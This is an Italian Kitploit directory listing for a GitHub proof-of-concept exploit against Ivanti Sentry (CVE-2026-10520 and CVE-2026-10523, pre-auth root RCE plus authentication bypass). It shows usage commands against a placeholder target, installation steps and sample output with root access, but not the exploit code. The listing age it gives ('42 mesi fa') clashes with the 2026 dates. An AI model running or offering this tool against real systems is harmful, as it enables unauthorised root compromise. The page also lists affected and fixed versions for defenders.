Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-10520 — CVE-2026-10520 | Kitploit
Strumenti/GitHubGitHub/0xblackash/cve-2026-10520
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHub0xblackash/cve-2026-10520

CVE-2026-10520

CVE-2026-10520

Vedi Repository
42 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

🎯 CVE-2026-10520 e CVE-2026-10523 - Ivanti Sentry

Immagine ChatGPT 11 Giu 2026, 11:19:12 AM

Ivanti Sentry Critical RCE

Esecuzione Remota di Codice senza Autenticazione + Bypass dell'Autenticazione

Autore: Ashraf Zaryouh "0xBlackash"

GitHub


📌 Panoramica

Due vulnerabilità critiche che interessano Ivanti Sentry (precedentemente MobileIron Sentry):

  • CVE-2026-10520 → CVSS 10.0 - Iniezione di comandi del sistema operativo pre-autenticazione (RCE come root)
  • CVE-2026-10523 → CVSS 9.9 - Bypass dell'autenticazione

Queste falle consentono a un attaccante non autenticato di compromettere totalmente il sistema.


✨ Funzionalità

  • ✅ PoC pulito e veloce
  • ✅ Pre-autenticazione (nessuna credenziale necessaria)
  • ✅ Esecuzione comandi a livello root
  • ✅ Formattazione dettagliata dell'output
  • ✅ Supporto proxy
  • ✅ Modalità verbose
  • ✅ Bella interfaccia terminale

🚀 Utilizzo

root@kitploit:~
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>

Esempi

root@kitploit:~
# Utilizzo base
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"

# Modalità verbose
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v

# Con proxy
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080

# Controllo kernel
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"

📋 Opzioni


🛠️ Installazione

root@kitploit:~
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py

📷 Exploit riuscito

Quando è vulnerabile, vedrai:

root@kitploit:~

 ██████╗ ██╗  ██╗██████╗ ██╗      █████╗  ██████╗██╗  ██╗ █████╗ ███████╗██╗  ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║     ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║  ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║     ███████║██║     █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║     ██╔══██║██║     ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║  ██║╚██████╗██║  ██╗██║  ██║███████║██║  ██║
 ╚═════╝ ╚═╝  ╚═╝╚═════╝ ╚══════╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝
  
          CVE-2026-10520 & CVE-2026-10523 PoC Exploit
          Ivanti Sentry Pre-Auth RCE + Auth Bypass
          
          Author: Ashraf Zaryouh "0xBlackash"
          GitHub: https://github.com/0xBlackash


[+] Target is VULNERABLE!
Command Output:
uid=0(root) gid=0(root) groups=0(root)

⚠️ Disclaimer

Questo strumento è solo per test di sicurezza educativi e autorizzati.
L'uso non autorizzato contro sistemi di cui non si è proprietari è illegale.
L'autore non si assume alcuna responsabilità per un uso improprio.


🔧 Versioni interessate

  • Ivanti Sentry prima di 10.5.2, 10.6.2, 10.7.1

Corretto in: 10.5.2 / 10.6.2 / 10.7.1


📜 Riferimenti

  • Advisory ufficiale Ivanti
  • Ricerca originale di watchTowr Labs
  • Voci NVD: CVE-2026-10520, CVE-2026-10523

Realizzato con ❤️ da Ashraf Zaryouh "0xBlackash"

Metti una stella al repository se lo hai trovato utile! ⭐

Scarica lo strumento
ArgomentoDescrizioneObbligatorio
--urlURL del target (es. https://target:8443)Sì
--cmdComando da eseguireSì
-v, --verboseAbilita output verboseNo
--proxyProxy HTTP (host:porta)No